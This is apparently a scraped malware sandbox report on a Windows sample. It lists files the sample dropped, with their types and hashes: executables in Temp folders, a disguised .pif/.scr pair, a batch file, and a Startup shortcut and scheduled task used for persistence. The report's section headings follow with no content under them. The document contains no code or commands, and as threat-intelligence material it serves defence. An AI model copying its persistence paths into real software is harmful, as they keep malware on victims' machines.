C:\Users\user\AppData\Local\Temp\1000223001\36f677264b.exe	PE32 executable (GUI) Intel 80386, for MS Windows	566728AF17C4D70FE4649EE22A80F9DD	F998138CEC60416B9F9A655F39B28C577EE8A126	B23BFB6C78F2608D465E2EECDE76CEB1F6211A7996547D7D6B89C8CE768A71C7
C:\Users\user\AppData\Local\Temp\1000255001\channel2.exe	PE32 executable (GUI) Intel 80386, for MS Windows	F4C78D18C5B5CB531C897F23CF3D3FED	5C0F3D158F3A4DE86AB0C811CDD945236AFD4740	4553D0B891772C5170F9E840AE21F514C50C92636462A1BC785E536857456321
C:\Users\user\AppData\Local\Temp\1000256001\BowExpert.exe	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive	DB2A12EDC73769F2F2B6B01545AFE2C3	73DC44FB0753296F51B851299F468031CEB77B54	E6DB7D34B498982601B2C45AC5B2A1C1B9502E502514CCFFAE9862F2AA719F42
C:\Users\user\AppData\Local\Temp\1000260001\Channel1.exe	PE32 executable (GUI) Intel 80386, for MS Windows	F9E43AEFFF1576AA7ADFC1688D5A24BF	9ACBCA30ABA919B26F1439668EBDB1B6A38E46EA	B1FCE873959EE7296C5D7307FC3E4302BC013C8DDCE57EE77708A94E4416653A
C:\Users\user\AppData\Local\Temp\246122658369	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3	761FCAD5DBF636BF6B6E439E0203443F	288129BCB5109173EF496214BD28D234F9DD9754	0C129566502975AA34EBB4C7BD3003A9A82F1D668B065FF61A52E393442D132A
C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	PE32 executable (GUI) Intel 80386, for MS Windows	0EC1F7CC17B6402CD2DF150E0E5E92CA	8405B9BF28ACCB6F1907FBE28D2536DA4FBA9FC9	4C5CA5701285337A96298EBF994F8BA013D290C63AFA65B5C2B05771FBBB9ED4
C:\Users\user\AppData\Local\Temp\591950\E	data	6A22704AE494645CA19955DE0CB879BC	ACC40B89422C32563656441519DF5D2199772398	F4E8BEB419142C0B8152CD8028B95A877B938A1F400C610DEE9E4139484385D6
C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	PE32 executable (GUI) Intel 80386, for MS Windows	18CE19B57F43CE0A5AF149C96AECC685	1BD5CA29FC35FC8AC346F23B155337C5B28BBC36	D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
C:\Users\user\AppData\Local\Temp\Competent	data	D79DDDA7E49B51BB69F59808170A5E63	B791857AE7B920D50F2FC97F0895F289C6A9E8BD	609B33673BA3698DE21D56BCE0A871D9D96269C7D86BC087419610452675A90E
C:\Users\user\AppData\Local\Temp\Corporate	data	57B8AB1323416077ED8BB346DD2DAA09	43116DAE9716CAF4E7F43943A89E357204C842F8	1A8D43ECF42D62C9F4DFDAD24C25136A028760A19CF4FD27336BFBB0962426B9
C:\Users\user\AppData\Local\Temp\Entrepreneurs	data	1C78EAD3742C95A2C4DF31C8D71E0F1B	A075CCA4D9D8FA5FE3DDBF1F2D6E120208CB5B17	B25E0F67C38257DBC0AB9A7D6AF8870C878211ABD4E51B8DB52D9C3E2272652D
C:\Users\user\AppData\Local\Temp\Greatest	data	043E35E2330184D548101DFDB638BE96	F73E6F2AF1052B4810820C68F9693E90F6A07D6D	2D081C4A75403C808336CD690598E765D1277CEA32E3CEA2CB7BC0E62AD35C77
C:\Users\user\AppData\Local\Temp\Honda	ASCII text, with very long lines (574), with CRLF line terminators	CEF464062B7E5B404539D0C443917907	01802C968D8917FAB13D71BFE4ED62E36E965745	5C1046EA8E740FAAAF01E2818EBF5CEA15D398594A26B8BB76E8B3DA6DBD1BBA
C:\Users\user\AppData\Local\Temp\Honda.bat (copy)	ASCII text, with very long lines (574), with CRLF line terminators	CEF464062B7E5B404539D0C443917907	01802C968D8917FAB13D71BFE4ED62E36E965745	5C1046EA8E740FAAAF01E2818EBF5CEA15D398594A26B8BB76E8B3DA6DBD1BBA
C:\Users\user\AppData\Local\Temp\Itsa	data	20CA365E882B4C4A95B110E62F8A4C08	662E9B589D89DE106713F361D8B2536740554785	2739A9B72A38C08A6385701C6BAFEB7FDD7FAE8B33ACE80732EC934EC8518C6C
C:\Users\user\AppData\Local\Temp\Provides	data	72DCAD57E5699DC20CB41F6AE4ACD115	CB7E6842F24319262605EA2C1BF3A7EAE60358AF	945D570376B997851FD74131BCF117AAD625341FCB7B756409E7CB711632CB0C
C:\Users\user\AppData\Local\Temp\Reveal	data	D6A091E43DB1334C92A9163FB999AA13	380674ED8D23C1EC2F9A5F5B0167970B296772A7	2299A0DF735B5C6A171DDD6A1B009756C19EC3BB1383BEF34BCA8FA7F4A6CF09
C:\Users\user\AppData\Local\Temp\Scottish	data	EA1CFAD1B98DA498ADDAD255609D0E5F	14FA7E96806624330A8899B215550122AEB94C91	DA224EA0C81FD05189621037F4F0B856F47DD1FB0841D4142395F638DA7EB802
C:\Users\user\AppData\Local\Temp\Screw	data	5FC7641883018EDBF0EAD49AF5EC3CBC	B021E03764AA36D5B5176AB9DBD825001D9797C8	419E973C6E735BBA8B60704A962E0B79D285E7A09CB317AEFAB1ED001A1BF344
C:\Users\user\AppData\Local\Temp\Still	data	5737221E4786A16DB1D00B526A889913	B44EF92D0F12E91E236F96359FA3667C773703AB	743304691772B7F4B1254B7EC4DEFE408ABD5380C260906FF5D51018CC51C7F4
C:\Users\user\AppData\Local\Temp\Tmp1486.tmp	data	1420D30F964EAC2C85B2CCFE968EEBCE	BDF9A6876578A3E38079C4F8CF5D6C79687AD750	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
C:\Users\user\AppData\Local\Temp\Tmp14D5.tmp	data	1420D30F964EAC2C85B2CCFE968EEBCE	BDF9A6876578A3E38079C4F8CF5D6C79687AD750	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
C:\Users\user\AppData\Local\Temp\Whom	data	CF18A7ED11645523ADDBD2FBB31B014D	09CAF4ED6B6822E838D3512CE5A75E4125192C5F	27DBF0E6F006AE0F7FA94CD33287E7F3AB85E1FA637636EFF8E94EB649E45990
C:\Users\user\AppData\Local\Temp\Wireless	data	DF9A85AF5771EA736A104B6E3EB86F0B	319CB80EED888D089AB5B6944ADBCBE89C3195EB	CEE5172F67CACBC90062C13713A08561B6984CB6C3C98663B7E541445B2FD492
C:\Users\user\AppData\Local\Temp\fed0c9a4d3\Hkbsse.exe	PE32 executable (GUI) Intel 80386, for MS Windows	F9A4F6684D1BF48406A42921AEBC1596	C9186FF53DE4724EDE20C6485136B4B2072BB6A6	E0A051F93D4C1E81CC142181D14249E246BE4C169645D667267134B664E75042
C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js	ASCII text, with no line terminators	B11FD7E16E222D604DFEEF154E83939A	3F00113773E4EC6169C9A1F4965387F305158724	D7B7398F7E8E2D72636502D4AE48DF216A819242EADC6D10A812B55328FEB246
C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	PE32 executable (GUI) Intel 80386, for MS Windows	18CE19B57F43CE0A5AF149C96AECC685	1BD5CA29FC35FC8AC346F23B155337C5B28BBC36	D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
C:\Users\user\AppData\Local\TrackGuard Technologies\z	data	6A22704AE494645CA19955DE0CB879BC	ACC40B89422C32563656441519DF5D2199772398	F4E8BEB419142C0B8152CD8028B95A877B938A1F400C610DEE9E4139484385D6
C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows	88367533C12315805C059E688E7CDFE9	64A107ADCBAC381C10BD9C5271C2087B7AA369EC	C6FC5C06AD442526A787989BAE6CE0D32A2B15A12A41F78BACA336B6560997A9
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\76b53b3ec448f7ccdda2063b15d2bfc3_9e146be9-c76a-4720-bcdb-53011b87bd06	data	5E0A8E102B0EF2FD67F8E0E083F4B99F	21A9D9B85940D3EBEFA15FB849760B6C2BD4D7B9	FD893C28E95CE10DC41921E79977A75BC2600752C386C41291FAF29DE83613C1
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url	MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js" >), ASCII text, with CRLF line terminators	36E7AB4A35DC5D68061BACF9622A9C95	D056707D6151F4CD93B20898789DEF672A706123	F113CB9545CAFF34A1D0D72A133778EF8216D23FF6AF40500C3963615195844C
C:\Users\user\AppData\Roaming\WIDeqOfZq9.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	30F46F4476CDC27691C7FDAD1C255037	B53415AF5D01F8500881C06867A49A5825172E36	3A8F5F6951DAD3BA415B23B35422D3C93F865146DA3CCF7849B75806E0B67CE0
C:\Users\user\Windows.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	DB5717FD494495EEA3C8F7D4AB29D6B0	39BA82340121D9B08E9CF3D4BA6DFCB12EB6C559	6B59309AB12F1859A94FB2CE1C98639B2A538E6E098FFAC127E45C29733BD993
C:\Windows\Tasks\Hkbsse.job	data	2F9A97652DE149B7C7101AF7C6A72A39	DF6EAF10A5A40CA434958658024F4E9025C17011	1224745D55801906FE2458D9B7BA60E43CEF04FC6F03A8DD8A4A7D981195E910

Windows Analysis Report wfJfUGeGT3.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report
wfJfUGeGT3.exe

Malware Threat Intel
Provided by